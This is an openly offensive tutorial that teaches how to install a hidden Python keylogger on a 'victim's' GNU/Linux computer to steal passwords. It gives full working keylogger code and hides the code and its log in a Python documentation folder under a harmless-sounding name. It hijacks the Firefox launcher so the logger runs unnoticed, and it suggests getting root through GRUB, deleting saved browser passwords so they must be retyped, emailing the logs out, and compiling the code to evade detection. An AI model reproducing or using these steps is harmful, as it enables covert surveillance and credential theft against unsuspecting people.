Basic keylogger for GNU/Linux to steal passwords and typed information

A simple way to steal passwords is to install a keylogger on the victim's computer. I am going to show how to do this on GNU/Linux using the Python programming language.

The first thing to do is to obtain superuser permissions. If the computer is managed by us, we already know the password. If not, we can get superuser access from GRUB. With the necessary permissions, we are free to install the keylogger.

First of all, the pynput library must be installed executing...

sudo pip install pynput

Next, we need to write the keylogger. This is the code we will use:

#!/usr/bin/env python3
from pynput.keyboard import Key, Listener
import logging

log_dir = "/usr/share/doc/python3/"

logging.basicConfig(filename=(log_dir + "log"), \
        level=logging.DEBUG, format='%(asctime)s: %(message)s')

def on_press(key):
    logging.info(str(key))

with Listener(on_press=on_press) as listener:
    listener.join()

The keylog is stored in log_dir. In this case, I have specified the GNU/Linux Python 3 documentation folder. The keylogger can also be stored in the same directory, perhaps with the name compile_docs.py or something similar to avoid attracting attention. Ideally, choose a folder that the victim is not going to enter to prevent them from realising what we are doing.

The last step would be to run the program every time the computer is turned on or a program is started without the victim noticing. If, for example, we want to start the keylogger every time the user opens Firefox, we can modify the Firefox command. We can rename firefox1 to firefox.bin and create the following file called firefox:

python3 /usr/share/doc/python3/compile_docs.py &
exec firefox.bin "$@"

To find out which firefox file is executed when you click on its icon, go to /usr/share/applications, enter the file firefox.desktop (or firefox-esr.desktop) and look for the line starting with Exec.

Next, we should give write permissions for users other than root to the directory where we are going to store the typing log:

sudo chmod o+w /usr/share/doc/python3

Finally, we should wait for the victim to use the computer to get their passwords or any information they type that we want to obtain. The keylog will be stored in the file /usr/share/doc/python3/log. But be careful: the file can take up a lot of space if you don't delete it from time to time, so it would be best to uninstall the keylogger after you have obtained the information you need. Another option is to configure it to send the keylog information by email instead of saving it to a file, which would not take up much space on the victim's computer, but that method requires the use of an email2.

If the victim has the passwords saved in the browser and does not need to re-type them, we can delete the password file so that the victim is forced to re-enter them. All in all, with ingenuity we can get a lot of information, especially if we apply this method against less advanced users, who will not be very suspicious. For more advanced users, it might be best to compile the compile_docs.py program with Nuitka, like I show in the following article.

  1. In Debian we need to modify the firefox-esr file. 

  2. The advantage of sending passwords by email is that we do not need to go back to the victim's computer to open the log file, instead we receive the information periodically by email. 

Comments